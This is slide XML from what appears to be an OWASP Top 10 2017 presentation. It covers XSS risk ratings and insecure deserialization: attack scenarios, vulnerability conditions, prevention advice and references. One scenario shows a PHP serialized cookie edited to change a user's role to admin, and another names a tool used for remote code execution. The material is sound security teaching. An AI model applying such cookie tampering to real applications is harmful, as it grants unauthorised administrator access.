          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141652546"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="OpenSymbol"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks.</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n>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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AU" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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310475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Example Attack Scenarios</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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A React app calls a set of Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>microservices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a: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Insecure Deserialization?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Distributed applications or those that need to store state on clients or the filesystem may be using object serialization. Distributed applications with public listeners or applications that rely on the client maintaining state, are likely to allow for tampering of serialized data. This attack is possible with binary formats like Java Serialization or text based formats like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Json.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Applications and APIs will be vulnerable if the when:</a:t>
            </a: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The serialization mechanism allows for the creation of arbitrary data types, AND</a:t>
            </a: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There are classes available to the application that can be chained together to change application behavior during or after deserialization, or unintended content can be used to influence application behavior, AND</a:t>
            </a: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The application or API accepts and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> hostile objects supplied by an attacker, or an application uses serialized opaque client side state without appropriate tamper resistant controls. OR</a:t>
            </a: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Security state sent to an untrusted client without some form of integrity control is likely vulnerable to deserialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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4"/>
              </a:rPr>
              <a:t>OWASP Deserialization Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Validate All Inputs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId8"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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9"/>
              </a:rPr>
              <a:t>CWE-502: Deserialization of Untrusted Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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0"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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1"/>
              </a:rPr>
              <a:t>https://github.com/mbechler/marshalsec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The only safe architectural pattern is to not accept serialized objects from untrusted sources or to use serialization mediums that only permit primitive data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If that is not possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Implement integrity checks or encryption of the serialized objects to prevent hostile object creation or data tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Enforce strict type constraints during deserialization before object creation; typically code is expecting a definable set of classes. Bypasses to this technique have been demonstrated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Isolate code that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, such that it runs in very low privilege environments, such as temporary containers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Restrict or monitor incoming and outgoing network connectivity from containers or servers that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-17145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Monitor deserialization, alerting if a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> constantly.</a:t>
            </a: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A8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
